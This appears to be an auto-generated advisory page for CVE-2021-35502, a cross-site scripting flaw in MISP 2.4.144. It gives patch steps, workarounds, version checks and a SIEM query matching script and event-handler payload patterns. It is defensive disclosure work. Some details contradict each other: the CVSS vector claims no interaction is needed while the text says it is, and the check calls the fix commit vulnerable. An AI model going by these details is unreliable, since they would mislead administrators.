Login Sign Up

CVE-2021-35502

9.8 CRITICAL
Cross-Site Scripting

📋 TL;DR

CVE-2021-35502 is a critical vulnerability in MISP (Malware Information Sharing Platform) that allows cross-site scripting (XSS) attacks due to improper input sanitization in generic field templates. This affects all users of MISP 2.4.144 who access the platform through a web browser. Attackers can inject malicious scripts that execute in victims' browsers when viewing certain data.

💻 Affected Systems

Products:
  • MISP (Malware Information Sharing Platform)
Versions: 2.4.144 specifically
Operating Systems: All platforms running MISP
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web interface component of MISP. Requires user interaction (viewing malicious content) for exploitation.

📦 What is this software?

Misp by Misp

View all CVEs affecting Misp →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of user sessions, credential theft, privilege escalation, and potential remote code execution through chained attacks.

🟠

Likely Case

Session hijacking, data theft, and unauthorized actions performed on behalf of authenticated users.

🟢

If Mitigated

Limited impact with proper input validation and output encoding in place, though still potentially dangerous.

🌐 Internet-Facing: HIGH - Web applications exposed to the internet are directly accessible to attackers.
🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could still exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires the attacker to inject malicious content that a victim views. The vulnerability is in the template rendering engine.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.4.145 and later

Vendor Advisory: https://github.com/MISP/MISP/commit/2fde6476dc3173affc61874ba2adb35400a8fda5

Restart Required: Yes

Instructions:

1. Backup your MISP instance and database. 2. Update MISP to version 2.4.145 or later using git: 'git pull origin 2.4'. 3. Run the update script: 'sudo -u www-data bash /var/www/MISP/app/Console/cake Admin updateMISP'. 4. Restart the web server: 'sudo systemctl restart apache2' (or your web server).

🔧 Temporary Workarounds

Input Validation Filter

all

Implement additional input validation for generic field data before processing.

# Add custom validation in app/Controller/AppController.php or relevant controllers

Content Security Policy

linux

Implement strict CSP headers to mitigate XSS impact.

# Add to web server config: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
# For Apache: in .htaccess or virtual host config

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block XSS payloads in requests
  • Disable or restrict access to generic field functionality if not required

🔍 How to Verify

Check if Vulnerable:

Check MISP version: 'cd /var/www/MISP && git log --oneline -1'. If commit hash includes 2fde6476 or version is 2.4.144, you are vulnerable.

Check Version:

cd /var/www/MISP && git describe --tags || echo 'Not a git repo, check version manually'

Verify Fix Applied:

Verify version is 2.4.145+: 'cd /var/www/MISP && git describe --tags'. Check that the vulnerable file has proper sanitization: 'grep -n "h($field['value'])" app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp'

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST/GET requests with script tags or JavaScript in parameters
  • Multiple failed login attempts following suspicious requests

Network Indicators:

  • HTTP requests containing <script> tags or JavaScript in URL parameters
  • Unexpected outbound connections from MISP server

SIEM Query:

source="misp_access.log" AND ("<script" OR "javascript:" OR "onerror=" OR "onload=")

📊 Metadata

CVE ID: CVE-2021-35502
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: June 25, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON